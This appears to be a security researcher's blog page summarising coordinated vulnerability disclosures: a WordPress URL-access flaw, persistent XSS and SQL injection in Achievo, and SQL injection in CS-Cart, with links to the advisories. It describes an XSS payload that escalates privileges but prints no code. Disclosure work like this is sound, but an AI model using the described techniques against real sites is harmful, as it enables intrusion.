Recent
WordPress >= 2.9 Failure to Restrict URL Access
1. *Advisory Information*
Title: WordPress >= 2.9 Failure to Restrict URL Access
Date published: 13/02/2010
2. *Vulnerability Information*
Class: Failure to Restrict URL Access
Remotely Exploitable: Yes
Locally Exploitable: Yes
[BONSAI] XSS and SQL Injection in Achievo <= 1.3.4
Today Andres Riancho owner of Bonsai Information Security (Argentina) and lead developer of w3af has released a couple of advisories on vulnerabilities in Achievo <= 1.3.4 which we found a few months ago after our vulnerability research into common web applications.
The affected web application is Achievo <= 1.3.4. Achievo suffered from multiple simple persistent XSS vulnerabilities within their scheduler module and an SQL injection vulnerability within their dispatch.php file.
Achievo is a flexible web-based resource management tool for business
environments. Achievo’s resource management capabilities will enable
organisations to support their business processes in a simple, but effective
manner.
I and Andres worked on quite an novel (to me) payload for the persistent XSS vulnerability which we found. Essentially the payload we worked on was an AJAX script which sent POST requests to the vulnerable application in order to escalate a users privileges. A write up by Andres on the payload can be found here: http://www.bonsai-sec.com/blog/index.php/cross-site-scripting-payloads/
For the original advisories:
All vulnerabilities found were disclosed in an ethical manner. We worked along side the affected application developers in order to fix the vulnerabilities found. The advisories were not published until the developers had fixed and updated their software.
[BONSAI] SQL Injection in CS-Cart <= 2.0.5
Here is one of the vulnerabilities which I found during my research for Bonsai Security a few weeks ago. The research consisted of vulnerability assessing commercial and open source ecommerce web applications over a 2 week period.
During the time of my research I learnt a great deal from Andres Riancho (w3af/bonsai-sec owner) and from the vulnerability assessments them selves. So what did I learn? I learnt that patience is definitely a virtue, javascript is a pain in the ass, ecommerce web application developers need to invest more time on security and a lot more as regards to perfecting my assessment techniques.
Here is the vulnerability report:
http://www.bonsai-sec.com/research/vulnerabilities/cs-cart_SQL-injection-0100.txt
Here is a great post by Andres on the difficulty on the actual exploitation:
http://www.bonsai-sec.com/blog/index.php/not-the-average-sql-injection/
A massive thanks to Andres for giving me the opportunity to work for him. I learnt more in the (just over) two week period working for him than I could have learnt in a whole 12 months.
